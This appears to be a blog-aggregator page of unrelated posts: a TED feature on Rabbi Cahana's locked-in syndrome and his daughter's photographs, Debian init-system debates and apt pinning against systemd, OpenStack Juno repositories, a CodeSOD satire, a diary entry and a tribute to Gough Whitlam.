Kitra began documenting her father’s recovery in photographs and video, creating layered images that — in contrast to her photojournalistic work — are more abstract and emotional. “I wanted to try to find a way to take photographs that reflected the mystical things that were happening in the hospital room,” she says. “How do I explain, in a photograph, the power that another human being has to either add or detract from the healing of another person? I started a process of trying to tell a story in images.”

As Rabbi Cahana began to regain his ability to speak, Kitra started recording his voice. She is now in the process of developing this body of work for an exhibition to help raise support for his ongoing care and rehabilitation.

Below, see Kitra’s stunning images — accompanied by her father’s poems — and hear more about the thoughts behind them. But first, a Q&A with Rabbi Cahana himself, in which he describes his own experience.

Rabbi Cahana writes: "You have to believe you’re paralyzed to play the part of a quadriplegic. I don’t. In my mind and in my dreams every night I Chagall-man float over the city, twirl and swirl, with my toes kissing the floor. I know nothing about this statement of man without motion. Everything has motion. The heart pumps, the body heaves, the mouth moves, the eyes turn inside-out.  We never stagnate. Life triumphs up and down." Image: Kitra Cahana

Rabbi Cahana writes, “You have to believe you’re paralyzed to play the part of a quadriplegic. I don’t. In my mind and in my dreams, every night I Chagall-man float over the city, twirl and swirl, with my toes kissing the floor. I know nothing about this statement of man without motion. Everything has motion. The heart pumps, the body heaves, the mouth moves, the eyes turn inside-out. We never stagnate. Life triumphs up and down.” Image: Kitra Cahana

Rabbi Cahana answers our questions on being locked in

Can you tell us what happened, from your point of view?

In July of 2011, upon returning from a weeklong visit to my mother and sister’s home in Houston, I had a stroke that shut down my body into a complete paralysis besides my mind and my uneasy use of my weakened, blurred eyes. Locked-in syndrome, they called it. “The air weighs a hundred pounds,” I wanted to say to anyone who was interested.

I was not in discomfort. I felt the sensation of touch on me, and surrounding me. I was sure that I had a helmet over my head to safeguard me. My neck itself seemed to weigh fifty pounds. A mysterious tortoise-shell immediately clasped me and kept me safe whenever needed. With my torso secure, my limbs felt doubled — the wooden petrified ones tethered by leather straps to ones jumping and slapping around. It was my duty to bring these fiery, spirited, animated parts to merge with my outer deadwood. I worked incessantly through sleepless nights and tyrannical days to fuse the miniature into the large. I kept hearing sirens from outside the hospital interrupting this task. It took about a year until each member became whole again, until they became one.

It took me three and a half months to get off the artificial breathing machine. That was my first miraculous victory. The next task was to get my epiglottis active. They wanted to give me thickened food — puréed this-and-that — whereas I wanted raw vegetables and fruit. I was denied the right to drink water for months over months. Water is the source of life, that which I craved most as an elixir. I dreamt of it. I tasted it. I could sense the coldness and the raw beauty of thirst — parched parts quenched. These days I eat whatever I want, whatever I am blessed with. I have a good physio who stands me upright, and a speech therapist to bring out the voice.

How would you describe your mental and emotional state during the time of being locked in?

The stroke transcended me. I don’t know much about it except that I was replanted into the ground and found my discombobulated bodyparts spread across the landscape. My holy work of these last three years has been to re-unify from a central whirlwind of light — dizzying, upside-down, topsy-turvy. I want to grow this plant of mine out of the underground. I imagine this is what every seed sees before it proceeds.

Doctors live by science and statistics. Rabbis live by inner spirit and G-dliness. Nobody has ever asked me what it’s like to have a paralyzed digit — fingers that lead a motionless existence. I, too, refrain from asking: “How does it feel to handle dried-up bones? Do you fear a life without movement?” But this is the under-exchange of everyone in touch with those who can’t touch back. My biggest loss is the gentle caress that I once could give.

Throughout this process, the air I breathe has been full with open prayers of love, with eyes upon me, soothing, cooing soft-spoken kindnesses. My family wiggles my flapping shoulder blades to revive them. My congregation visits me as if agreeing that nothing has happened; there is no loss, there is only us today and our future. We all ease each other’s lives. I am wondrously happy for the privilege of seeing life in this dimension. I capture miracles in instants. Challenge is privilege. It is a privilege to live this story.

The images Kitra takes of you feel very vulnerable and reflective. Did your father-daughter relationship change dramatically after the stroke?

I am in awe of Kitra’s art and her desire to unstiffen what is locked up. She finds communities of the locked-away; she researches for breakthroughs and latest up-to-date machinery and medical advances. She speaks the language of negating the impossible. She champions me through pitfalls and traps of institutional clumsiness. She sees me already walking through the streets; she chaperones me down the halls of my returning. It is wondrous to never be defeated. Transformation is celebratory.

I loved Kitra the same in the instant of her birth. She created me as a father that day. I’ve only begun to emerge as she nurses me and nurtures me up to a sense of knowing what it means to be alive. My love for her and all my children has deepened in the emergency status. There is only intimate language in the presence of a precious person of your own issue. The privilege of parenthood is even more daunting than the responsibility. I am overwhelmed with the gratitude of being remade in my children’s image now that they are adults. I tell them I see G-d’s face when they present their loving glow. They are the Sabbath candles themselves.

You wrote texts to go with each of Kitra’s images. To whom are they addressed? They seem to be meditations on consciousness rather than communication. After your illness, was all your communication in this form?

After coming to consciousness, the mind narrowed to simple whispers. I was bare-faced and raw matter. The blessing ‘to bless’ in Hebrew is “Yisai Adonai Panav Elecha,” or “May G-d lift your countenance.” “Ya’er Panav Elecha v’Chuneka.” “May G-d’s light illuminate your face and bring forth your grace.” Or as King David said, “From G-d’s divine light we see light.” At the moment of arising from the stroke, I felt G-d lift my face and pierce into an inner glow. I spoke to that light and from it all at once. I understood that everyone gets this brilliant radiance early in life, and I know that it’s a mere temporary flash to return to again and again. This is enlightened consciousness. It’s a flash that I ever try to retrieve.

All my writings are love songs to G-d. I only have thanks. G-d has given me a future again. And this is a glimpse (the marvel) of eternity’s touch.

Your texts refer to a passionate love. Is this about the love between husband and wife, or love for the divine?

Both. G-d’s challenge to each human being is to reach the fullest extent of your capacity to love and ever grow it, ever test it, ever push it. That’s why we are created and how we continue creating ourselves. The passionate love of me to my wife, my wife to me, is an embodiment of the challenging love that the Almighty presents before us. How much of the heavenly abode do we bring into our love? Loving [my wife] Karen, she loving me, brings us to seek the Almighty’s presence. When I pray to G-d I ask to find Karen. When I’m near Karen, I ask her to help me discover the Creator of Life. This is love language. It doesn’t matter what state of disrepair the body is in. This is the heart’s fullest reach. Nothing has changed in our love for each other. I am alive because I live for Karen’s eyes upon me once again.

001

Rabbi Cahana writes, “What is beautiful? We can close our eyelids, but it’s hard to close our ears. All directions can come to the ear. We can’t really turn our heads, like in seeing, to a particular angle. Hearing is how G-d responds to prayer. That’s sincere.” Photo: Kitra Cahana

Rabbi Cahana writes, "Oh my wife. I belong to you. I see the skin fold hurry under your eyelids. I want to be your sleep. I walk along your long grace. Your bones are hard to everyone’s stance but not to my fingers’ touch. There are tender demands when you open your lips, your tongue, your teeth. Your teeth are teaching my empty throat. Am I only just now breathing? G-d has given me this. We are face, two legs, alike. We have no weight. Wherever we are, the world is turning. This is nonesuch time." Image: Kitra Cahana

Rabbi Cahana writes, “Oh my wife. I belong to you. I see the skin fold hurry under your eyelids. I want to be your sleep. I walk along your long grace. Your bones are hard to everyone’s stance, but not to my fingers’ touch. There are tender demands when you open your lips, your tongue, your teeth. Your teeth are teaching my empty throat. Am I only just now breathing? G-d has given me this. We are face, two legs, alike. We have no weight. Wherever we are, the world is turning. This is nonesuch time.” Image: Kitra Cahana

<iframe allowfullscreen="allowfullscreen" class="wpcom-protected-iframe " frameborder="0" height="552" id="wpcom-iframe-b4fbec45b1e5975c6a0e4ac16b609e3e-5446ae179303a" mozallowfullscreen="mozallowfullscreen" name="wpcom-iframe-b4fbec45b1e5975c6a0e4ac16b609e3e-5446ae179303a" scrolling="no" webkitallowfullscreen="webkitallowfullscreen" width="982"></iframe> <script type="text/javascript"> ( function() { var func = function() { var iframe_form = document.getElementById('wpcom-iframe-form-b4fbec45b1e5975c6a0e4ac16b609e3e-5446ae179303a'); var iframe = document.getElementById('wpcom-iframe-b4fbec45b1e5975c6a0e4ac16b609e3e-5446ae179303a'); if ( iframe_form && iframe ) { iframe_form.submit(); iframe.onload = function() { iframe.contentWindow.postMessage( { 'msg_type': 'poll_size', 'frame_id': 'wpcom-iframe-b4fbec45b1e5975c6a0e4ac16b609e3e-5446ae179303a' }, window.location.protocol + '//wpcomwidgets.com' ); } } // Autosize iframe var funcSizeResponse = function( e ) { var origin = document.createElement( 'a' ); origin.href = e.origin; // Verify message origin if ( 'wpcomwidgets.com' !== origin.host ) return; // Verify message is in a format we expect if ( 'object' !== typeof e.data || undefined === e.data.msg_type ) return; switch ( e.data.msg_type ) { case 'poll_size:response': var iframe = document.getElementById( e.data._request.frame_id ); if ( iframe && '' === iframe.width ) iframe.width = '100%'; if ( iframe && '' === iframe.height ) iframe.height = parseInt( e.data.height ); return; default: return; } } if ( 'function' === typeof window.addEventListener ) { window.addEventListener( 'message', funcSizeResponse, false ); } else if ( 'function' === typeof window.attachEvent ) { window.attachEvent( 'onmessage', funcSizeResponse ); } } if (document.readyState === 'complete') { func.apply(); /* compat for infinite scroll */ } else if ( document.addEventListener ) { document.addEventListener( 'DOMContentLoaded', func, false ); } else if ( document.attachEvent ) { document.attachEvent( 'onreadystatechange', func ); } } )(); </script>

Rabbi Cahana writes, “There’s a new kind of slumber with a stroke. You get dizzy, lucid. There is a mini explosion and there is no up. There is no forward. It’s just twisting like a space-man’s walk, tethered to the intangible. It’s amazing. I was lifted into a hoist. I said to myself: Remember you’re in the air for real now. Hover over this bed, and be there more than you are under it.” Video: Kitra Cahana

My dream state is closer to G-d than any open-eyed watch of how foreshortened my wingspan might be. I feel awake and alive and follow through with what my body can’t seem to do. It’s not pretending when I say I believe this is only temporary. It is my open-aired will that makes these three years seem like only a blink. And still I see the world stumble by and I criticize its footwork. I still believe I walk more gracefully. After all, who among us is really sure-footed?

Rabbi Cahana writes, “My dream state is closer to G-d than any open-eyed watch of how foreshortened my wingspan might be. I feel awake and alive and follow through with what my body can’t seem to do. It’s not pretending when I say I believe this is only temporary. It is my open-aired will that makes these three years seem like only a blink. And still I see the world stumble by and I criticize its footwork. I still believe I walk more gracefully. After all, who among us is really sure-footed?” Image: Kitra Cahana

Rabbi Cahana writes, "I singsong my body as its own cradle. Back and up head and down. There is a floating whir on my skin. Only a year and a half later will it dissipate. Its the skinny skin that crinkles. My eyes stay closed. All of life now will forever be whispers. But G-d’s ear is here." Image: Kitra Cahana

Rabbi Cahana writes, “I singsong my body as its own cradle. Back and up head and down. There is a floating whir on my skin. Only a year and a half later will it dissipate. Its the skinny skin that crinkles. My eyes stay closed. All of life now will forever be whispers. But G-d’s ear is here.” Image: Kitra Cahana

Kitra Cahana answers our questions about these images

What has your father’s experience been like for you?

It has been a shift in my trajectory. My father’s experience of the stroke was one of endless spirituality and curiosity and this mystical understanding of how to heal. He’s a rabbi, a spiritual leader and poet and as such often spoke in this kind of otherly language about reality and his experience — a very surreal, poetic language. His language has a cadence of its own. Sometimes it can be difficult to understand, but it speaks to me on a deep level. Somehow it’s very accessible to me.

We were raised on mystical ideas about G-d. ‘Does G-d exist?’ was never a relevant or pertinent question to my spirituality. The root question to ask is: How do people experience existence? Do you have an experience of a G-d or a G-dlike concept? is more telling to me, than declaring one’s belief in an unknown. I’ve approached a lot of what my father has said regarding his stroke in the same manner. I don’t question what he says, as in: ‘Did that really happen?’ He had many visions when the stroke first struck him. In one, he had an encounter, standing before G-d, wherein the totality of his own life, his own soul, accused him for all his wrong-doings and shortcomings. His own father’s soul came to his defense, and pleaded for my father to get more life. I don’t question whether that is real or not. I listen to him openly, trying to just understand what his experience of reality looks like.

How do you do that? How does he communicate?

Right after the stroke, we communicated through a blinking methodology where the transcriber recites the alphabet and he would blink at each letter. People started flocking to our ICU room, and then our hospital room, and he would hold these long conversations with them. Congregants, nurses and orderlies would come to his bedside at their break time and, through us, my father would counsel them. It was all in this very, very slow time — this sort of otherly orbit that was created in midst of the hustling, bustling hospital.

Initially, communication was extremely disorienting. Until we got into a good rhythm and flow — and established how to initiate vowels, and other shortcuts — there were so many miscommunications. We would recite the alphabet, A, B, C, D, and he would wait to blink at the correct letter. Afterwards he told us that anticipating each letter was excruciating. He would keep his eyes wide open, in fear that he would blink at the wrong letter and our whole communication would get thrown off. There were so many moments to misread what he wanted to say. Even when he started mouthing, and then speaking intermittently, it continued — and continues — to be difficult. Initially we tried different methods. We tried to do the alphabet of most commonly used letters, but there were a lot of confusions. There’s another smart system wherein the locked-in patient divides his or her gaze into different quadrants, and then divides each quadrant again to indicate a specific letter. We could have learned that language, but I think my father was in such a rush to express all the things running through his mind that the simple ABCD method was the easiest.

Can he feel his body right now?

He always had sensation. But he describes his first sensation as though he were floating through the ether. He has this strange description that each of his limbs were dead logs and tethered to each was this miniature limb that was just full of spirit — zinging all over the room. He said there was a rope attached to each of these smaller limbs, and that if the rope wasn’t there, these limbs would just fly across the world, to everywhere. I don’t necessarily understand his physical experience. He describes it as being rebirthed at 57 — that he was conscious, going through the birth canal. He says ‘I’m two years old now.’ To him that’s a complete privilege and blessing.

Initially, I started documenting him in the style that I know — traditional journalistic photographs. But those photographs were so literal. Those images spoke to the care and the love in our hospital room, but they weren’t able to access the deeper soul experience. My challenge was to find a visual language that would be in dialogue with our spiritual and emotional landscape.

Did changing your usual style feel good?

I’ve never felt like my documentary work reflected my inner essence. In a way, when I work on a story — documenting in a traditional documentary manner — I feel as though my role between my subject and the audience is one of a medium. There’s a subject who passes through my lens, my aesthetic filter, in order to reach an audience, a public. I can overlay an aesthetic voice to that, but I never felt like I was giving it my voice. Photographing my father — layering images, video and audio on top of each other — it’s the first time I’m expressing something deep inside of me in a photographic language. I’ve never felt that way about my work before. It’s the first seed. But it’s lovely growing into this new place with my father as a collaborator and subject.

What motivated you to speak at TEDMED?

It’s very difficult to express the sublime and the surreal in words and photographs. I wanted to attempt to communicate all that my family had experienced – my father’s brain stem stroke, and the profound spiritual awakening that followed – with others. This is what my father taught us; he said that all who came into his room of healing should expect to be healed themselves. Healing has to be mutual.

The stroke ruptured my reality as well as his. In those initial months, I saw sides of myself I never knew existed. I would have loved for him to have spoken at TEDMED himself but, as in the hospital — where my mother, sisters, brother and I acted as his mouthpiece — we continue to act in that capacity.

What impact do you hope the talk will have?

Part of my father’s message is that he hopes others will step outside of the space-time hustle and bustle that many of us are so used to. He experiences life in a kind of slow-time. He spent and continues to spend hours alone with himself.  That space of aloneness with his thoughts is not a place of anxiety, but a place of joy and introspection. I hope that others get a sense of this slow-space-time, where you exist only with yourself, with those other humans that you are intimate with, and – as my father would also say – with God.

Since my father’s stroke, I’ve become involved in a global community of people who have experienced brain stem strokes, either personally or on the part of a loved one. They are either still fully locked-in or have made progress, including some partial to full recoveries. So many of those who have experienced being locked-in were written off too early. Their families were told to expect very little. As a result, they did not receive proper rehabilitation therapies, nor were their bodies moved on a daily basis to maintain a minimum quality of comfort. I’ve seen health care professionals refuse to address the locked-in patient directly, speaking about him or her in the third person, insensitive to the fact that the person is still completely conscious and able to communicate. We struggle every day to sensitize health care professionals and institutions.

Healing is taxing. But what is even more taxing is trying to heal in systems and institutions that drain the already low reserves of patients. My father was able to have the spiritual experience that he had because he had a family and a congregation that preserved him in his role as father, husband and rabbi and advocated for him when he wasn’t able to.

You said before that he can feel his body now. To what extent?

He’s made huge progress — he breathes by himself, he predominantly has his own speaking voice to rely on now. It wanes, but he conducted a wedding last year, and he teaches in the synagogue. He has some motion capabilities. A lot of it’s about getting stronger; it’s really hard to rebuild an entire body all at once. I don’t know if or when he’s going to reach his limits, but that’s not an important question to me. To me, it’s about being part of his healing support network.

002

Rabbi Cahana writes, “When my brain exploded my body flew apart onto my backyard, only ten times larger. My mind landed on top of the hedges. One arm a mile away, another arm over here. Legs here, legs there. The torso somewhere else. It was my job to somehow bring these all back together. To bring the body back to the head. This was my spiritual duty.” Image: Kitra Cahana

Want to support Rabbi Cahana? Find out how.

And special thanks to TEDMED, for contributing to this piece.


TEDAndrew Bastawrous’ bakery for better eye care gets lift off, the Sleepy Man Banjo Boys make a video, and more

Andrew_Bastawrous_Mazda_rebel_with-cause

As always, members of the TED community have been very busy the past few weeks. Below, just a few of them making the news:

Earlier this month, Mazda promised to fund one of four projects dreamed up by TED Fellows — based on your votes. The winner: eye surgeon Andrew Bastawrous has won for his Eye Bake program. With Mazda’s help, he’ll be building up the Ujima Bakery in Kenya, which will employ local people while raising money to subsidize eye care. (Watch Andrew’s TED Talk, “Get your next eye exam on a smartphone.”)

Susan Cain is writing a children’s book, to be released in May 2015. While Quiet focused on the workplace, this new book — called Quiet Power – will focus on school, extracurriculars and family life. It’ll also feature illustrations by Grant Snider. (Watch Susan’s talk, “The power of introverts.” And read our interview with her: “How to teach a young introvert.”)

Speaking of school, Clay Shirky has banned the use of technology in his classes. In an essay on Medium, he admits that this is a bold move for a technologist. (Watch Clay’s most recent TED Talk, “How the internet will (one day) transform government.”)

The Sleepy Man Banjo Boys have made their very first music video: “Same Same Stars.” Watch it below. (And check out their TED Talk, “Teen wonders play bluegrass.”)

<iframe allowfullscreen="true" class="youtube-player" frameborder="0" height="360" src="http://www.youtube.com/embed/2JDaNYDQv7Y?version=3&amp;rel=1&amp;fs=1&amp;showsearch=0&amp;showinfo=1&amp;iv_load_policy=1&amp;wmode=transparent" type="text/html" width="586"></iframe>

Sculptor Janet Echelman has received the Smithsonian American Ingenuity Award in Visual Arts. She accepted the award at a gala award ceremony at the National Portrait Gallery in Washington, DC. (Watch Janet’s talk, “Taking imagination seriously.” And read about her sculpture at TED2014, “Skies Painted with Unnumbered Sparks.”)

Dave Eggers tells The San Francisco Chronicle that his publishing house, McSweeney’s, is applying to become a nonprofit. “It just seemed that increasingly many of the things that we wanted to do were nonprofit projects and not really things that you could reasonably expect to break even on,” he explains. (Watch Dave’s TED Prize Wish revealed in the talk, “Once upon a school.”)

Majora Carter has big plans for the shuttered juvenile detention center down the road from her childhood home in the Bronx, New York. Once a place known for its brutal conditions, she shares with Next City her plans to transform it into a space of opportunity in the community. (Watch Majora’s talk, “3 stories of local eco-entrepreneurship.”)


Planet DebianLucas Nussbaum: Tentative summary of the amendments of the init system coupling GR

This is an update of my previous attempt at summarizing this discussion. As I proposed one of the amendments, you should not blindly trust me, of course. :-)

First, let’s address two FAQ:

What is the impact on jessie?
On the technical level, none. The current state of jessie already matches what is expected by all proposals. It’s a different story on the social level.

Why are we voting now, then?
Ian Jackson, who submitted the original proposal, explained his motivation in this mail.

We now have four different proposals: (summaries are mine)

  • [iwj] Original proposal (Ian Jackson): Packages may not (in general) require one specific init system (Choice 1 on this page)
  • [lucas] Amendment A (Lucas Nussbaum): support for alternative init systems is desirable but not mandatory (Choice 2 on this page)
  • [dktrkranz] Amendment B (Luca Falavigna): Packages may require a specific init system (Choice 3 on this page)
  • [plessy] Amendment C (Charles Plessy): No GR, please; already resolved (Choice 4 on this page)

[plessy] is the simplest, and does not discuss the questions that the other proposals are answering, given it considers that they already have been resolved (even though I disagree with this analysis).

In order to understand the three other proposals, it’s useful to break them down into several questions.

Q1: support for the default init system on Linux
A1.1: packages MUST work with the default init system on Linux as PID 1.
(That is the case in both [iwj] and [lucas])

A1.2: packages SHOULD work with the default init system on Linux as PID 1.
With [dktrkranz], it would no longer be required to support the default init system, as maintainers could choose to require another init system that the default, if they consider this a prerequisite for its proper operation; and no patches or other derived works exist in order to support other init systems. That would not be a policy violation. (see this mail and its reply for details). Theoretically, it could also create fragmentation among Debian packages requiring different init systems: you would not be able to run pkgA and pkgB at the same time, because they would require different init systems.

Q2: support for alternative init systems as PID 1
A2.1: packages MUST work with one alternative init system (in [iwj])
(if you are confused with “one” here, it’s basically fine to read it as “sysvinit” instead. See this subthread for a discussion about this)
To the user, that brings the freedom to switch init systems (assuming that the package will not just support two init systems with specific interfaces, but rather a generic interface common to many init systems).
However, it might require the maintainer to do the required work to support additional init systems, possibly without upstream cooperation.
Lack of support is a policy violation (severity >= serious, RC).
Bugs about degraded operation on some init systems follow the normal bug severity rules.

A2.2: packages SHOULD work with alternative init systems as PID 1. (in [lucas])
This is a recommendation. Lack of support is not a policy violation (bug severity < serious, not RC). A2.3: nothing is said about alternative init systems (in [dktrkranz]). Lack of support would likely be a wishlist bug.

Q3: special rule for sysvinit to ease wheezy->jessie upgrades
(this question is implicitly dealt with in [iwj], assuming that one of the supported init systems is sysvinit)

A3.1: continue support for sysvinit (in [lucas])
For the jessie release, all software available in Debian ‘wheezy’ that supports being run under sysvinit should continue to support sysvinit unless there is no technically feasible way to do so.

A3.2: no requirement to support sysvinit (in [dktrkranz])
Theoretically, this could require two-step upgrades: first reboot with systemd, then upgrade other packages

Q4: non-binding recommendation to maintainers
A4.1: recommend that maintainers accept patches that add or improve
support for alternative init systems. (in both [iwj] and [lucas], with a different wording)

A4.2: say nothing (in [dktrkranz])

Q5: support for init systems with are the default on non-Linux ports
A5.1: non-binding recommendation to add/improve support with a high priority (in [lucas])

A5.2: say nothing (in [iwj] and [dktrkranz])

 

Comments are closed: please discuss by replying to that mail.

Planet DebianErich Schubert: Avoiding systemd isn't hard

Don't listen to trolls. They lie.
Debian was and continues to be about choice. Previously, you could configure Debian to use other init systems, and you can continue to do so in the future.
In fact, with wheezy, sysvinit was essential. In the words of trolls, Debian "forced" you to install SysV init!
With jessie, it will become easier to choose the init system, because neither init system is essential now. Instead, there is an essential meta-package "init", which requires you to install one of systemd-sysv | sysvinit-core | upstart. In other words, you have more choice than ever before.
Again: don't listen to trolls.
However, notice that there are some programs such as login managers (e.g. gdm3) which have an upstream dependency on systemd. gdm3 links against libsystemd0 and depends on libpam-systemd; and the latter depends on systemd-sysv | systemd-shim so it is in fact a software such as GNOME that is pulling systemd onto your computer.
IMHO you should give systemd a try. There are some broken (SysV-) init scripts that cause problems with systemd; but many of these cases have now been fixed - not in systemd, but in the broken init script.
However, here is a clean way to prevent systemd from being installed when you upgrade to jessie. (No need to "fork" Debian for this, which just demonstrates how uninformed some trolls are ... - apart from Debian being very open to custom debian distributions, which can easily be made without "forking".)
As you should know, apt allows version pinning. This is the proper way to prevent a package from being installed. All you need to do is create a file named e.g. /etc/apt/preferences.d/no-systemd with the contents:
Package: systemd-sysv
Pin: release o=Debian
Pin-Priority: -1
from the documentation, a priority less than 0 disallows the package from being installed. systemd-sysv is the package that would enable systemd as your default init (/sbin/init).
This change will make it much harder for aptitude to solve dependencies. A good way to help it to solve the dependencies is to install the systemd-shim package explicitly first:
aptitude install systemd-shim
After this, I could upgrade a Debian system from wheezy to jessie without being "forced" to use systemd...
In fact, I could also do an aptitude remove systemd systemd-shim. But that would have required the uninstallation of GNOME, gdm3 and network-manager - you may or may not be willing to do this. On a server, there shouldn't be any component actually depending on systemd at all. systemd is mostly a GNOME-desktop thing as of now.
As you can see, the trolls are totally blaming the wrong people, for the wrong reasons... and in fact, the trolls make up false claims (as a fact, systemd-shim was updated on Oct 14). Stop listening to trolls, please.
If you find a bug - a package that needlessly depends on systemd, or a good way to remove some dependency e.g. via dynamic linking, please contribute a patch upstream and file a bug. Solve problems at the package/bug level, instead of wasting time doing hate speeches.

Cory DoctorowI’m coming to Vancouver, Seattle, Portland, SF/Palo Alto!


As the tour with my graphic novel In Real Life draws to a close, my next tour, with my nonfiction book Information Doesn't Want to Be Free kicks off with stops down the west coast.

I've also got stops coming up in Warsaw, London, Stockholm, Ann Arbor, Baltimore, DC, and Denver -- here's the whole list. Here's some of what Kirkus Review had to say about the new book:

In his best-selling novel Ready Player One, Ernest Cline predicted that decades from now, Doctorow (Homeland, 2013, etc.) should share the presidency of the Internet with actor Wil Wheaton. Consider this manifesto to be Doctorow’s qualifications for the job.

The author provides a guide to the operation of the Internet that not only makes sense, but is also written for general readers. Using straightforward language and clear analogies, Doctorow breaks down the complex issues and tangled arguments surrounding technology, commerce, copyright, intellectual property, crowd funding, privacy and value—not to mention the tricky situation of becoming “Internet Famous.” Following a characteristically thoughtful introduction by novelist Neil Gaiman, rock star Amanda Palmer offers a blunt summary of today’s world: “We are a new generation of artists, makers, supporters, and consumers who believe that the old system through which we exchanged content and money is dead. Not dying: dead.” So the primary thesis of the book becomes a question of, where do we go from here? Identifying the Web’s constituents as creators, investors, intermediaries and audiences is just the first smart move. Doctorow also files his forthright, tactically savvy arguments under three “laws,” the most important of which has been well-broadcast: “Any time someone puts a lock on something that belongs to you and won’t give you the key, that lock isn’t there for your benefit.”

Planet Linux AustraliaAndrew Pollock: [life] Day 265: Kindergarten and startup stuff

Zoe yelled out for me at 5:15am for some reason, but went back to sleep after I resettled her, and we had a slow start to the day a bit after 7am. I've got a mild version of whatever cold she's currently got, so I'm not feeling quite as chipper as usual.

We biked to Kindergarten, which was a bit of a slog up Hawthorne Road, given the aforementioned cold, but we got there in the end.

I left the trailer at the Kindergarten and biked home again.

I finally managed to get some more work done on my real estate course, and after a little more obsessing over one unit, got it into the post. I've almost got another unit finished as well. I'll try to get it finished in the evenings or something, because I'm feeling very behind, and I'd like to get it into the mail too. I'm due to get the second half of my course material, and I still have one more unit to do after this one I've almost finished.

I biked back to Kindergarten to pick up Zoe. She wanted to watch Megan's tennis class, but I needed to grab some stuff for dinner, so it took a bit of coaxing to get her to leave. I think she may have been a bit tired from her cold as well.

We biked home, and jumped in the car. I'd heard from Matthew's Dad that FoodWorks in Morningside had a good meat selection, so I wanted to check it out.

They had some good roasting meat, but that was about it. I gave up trying to mince my own pork and bought some pork mince instead.

We had a really nice dinner together, and I tried to get her to bed a little bit early. Every time I try to start the bed time routine early, the spare time manages to disappear anyway.

Worse Than FailureCodeSOD: Is It Safer to Use Numbers?

Mac didn't know anything about how the JavaScript on the search page worked, and he wasn't that great at CSS styling, but that didn't matter. He had his orders. As part of the latest round of enhancements, the front-end developer had added another search parameter which would be passed via the regular search URL, and the back end needed to be adjusted to accomodate. (You know... instead of 'http://initrode.com/search?a=xxx&b=yyy' it now was 'http://initrode.com/search?a=xxx&b=yyy&c=zzz'.)

No problem. Mac made his tweak in the code and ran a quick test...which failed instantly in a spectacular way. "WTF? It's a parameter. Must be already used..." he thought, but nope.

Digging deeper, Mac came upon the following:

public enum eQueryParametersCount
{
  New = 2,
  Filtering = 3,
  Navigation = 6,
  SwitchView = 7
}

Odd. And then peppered throughout...

int iCount = Request.QueryString.Count;
if (iCount != (int)eQueryParametersCount.New
      && iCount != (int)eQueryParametersCount.Navigation
      && iCount != (int)eQueryParametersCount.Filtering
      && iCount != (int)eQueryParametersCount.SwitchView
   )
{
  logger.Log("QueryString error: invalid querystring");
  Response.Redirect(PageManager.ErrorPage);
}

...and...

else if ((Request.QueryString.Count == (int)eQueryParametersCount.Filtering) && (!SetConfirmationMessage()))
     {
       if (!GetOverallQuality())
       {
         logger.Log("QueryString error: r not found or invalid value");
         Response.Redirect(PageManager.ErrorPage);
       }
     }

In short, the previous coders figured that it was much better to 'count' the number of parameters to determine what the user wanted instead of actually reading them. It also means you can never have 3 params because that is taken by a different enum.

As Mac set about tearing things apart he found himself considering how tough it would really be to pick up some web design skills.

 

Photo credit: Laineys Repertoire / Foter / CC BY

Planet DebianThomas Goirand: OpenStack Juno is out, Debian (and Ubuntu Trusty ports) packages ready

This is just a quick announce: Debian packages for Juno are out. In fact, they were ready the day of the release, on the 16th of October. I uploaded it all (to Experimental) the same day, literally a few hours after the final released was git tagged. But I had no time to announce it.

This week-end, I took the time to do an Ubuntu Trusty port, which I also publish (it’s just a mater of rebuilding all, and it should work out of the box). Here are the backports repositories. For Wheezy:

deb http://archive.gplhost.com/debian juno-backports main

deb http://archive.gplhost.com/debian juno main

For trusty:

deb http://archive.gplhost.com/debian trusty-juno-backports main

But of course, everything is also available directly in Debian. Since Sid/Jessie contains OpenStack Icehouse (which has more chance to receive long enough security support), and it will be like this until Jessie is released. So I have uploaded all of Juno into Debian Experimental. This shows on the OpenStack qa page (you may also notice that the team is nearly reaching 200 packages… though am planning to off-load some of that to the Python module team, when the migration to Git will be finished). On the QA page, you may also see that I uploaded all of the last Icehouse point release to Sid, and that all packages migrated to Jessie. There’s only a few minor issues with some Python modules which I fixed, that haven’t migrated to Jessie yet.

I can already tell that all packages can be installed without an issue, and that I know Horizon at least works as expected. But I didn’t have time to test it all just yet. I’m currently working on doing even more installation automation at the package level (by providing some OVS bridging init script and such, to make it more easy to run Tempest functional testing). I’ll post more about this when it’s ready.

Kelvin ThomsonDeath of Gough Whitlam

Gough Whitlam was a towering figure in Australian public life. I think he was the greatest man to ever grace the Australian Labor Party, and the most influential Australian Prime Minister of the past fifty years. He did this after enlisting during the Second World War with the RAAF. This was of course a very dangerous thing to do - my father's older brother John, after whom I have my middle name, did this too, but did not return.<o:p></o:p>

I was a year twelve student in 1972, and had a bright orange It's Time sticker on my school bag. I remember that after he won the election one of my schoolmates said to me that while he was keen for Gough to win, Gough would not be able to put an end to Australia's involvement in Vietnam, and to conscription, any time soon. I was crestfallen by this, and delighted when only a day or two later Gough's two-man Cabinet did precisely that.<o:p></o:p>

His leadership and vision for Australia was one of the key things that inspired me to join the Australian Labor Party, which I did in 1974. It was against the run of play, as Gough's government was thrown out comprehensively at the end of the next year. <o:p></o:p>

But his legacy has proved to be so longstanding that I think he can rightly claim to be the most influential Prime Minister of the past 50 years. It was such a monumental body of work that I cannot do justice to it, but there are a number of features of it which I want to single out. The introduction of free tertiary education. It made such a difference to the lives of so many. The more I look at it, the more I think it was a mistake to move away from that.<o:p></o:p>

Medibank, which was of course the predecessor of Medicare. It gave Australia quite possibly the best health care system in the world, where everyone, rich and poor alike, has access to high quality health care.<o:p></o:p>

The protection of the environment. Gough took the National government into the area of environment protection, preventing drilling of the Great Barrier Reef, ratifying the World Heritage Convention, the RAMSAR Convention, and passing the National Parks and Wildlife Conservation Act.<o:p></o:p>

Indigenous Affairs. Gough passed legislation to abolish discrimination against aboriginal people, and granted land rights to indigenous people, and returned lands in the Northern Territory to the Gurindji people.<o:p></o:p>

People will always draw on the aspects of someone's legacy that are consistent with their own views, and I am no different. In that vein I point out that in 1974 he wrote that traditional forms of democratic government are under challenge, and listed population growth as first among these. Later in that article he said “I do not envisage any dramatic increase in our present population, and indeed I would not wish to see one". I think he was absolutely right in that assessment. And indeed he cut migration numbers during his time as Prime Minister, which is perhaps not widely known.<o:p></o:p>

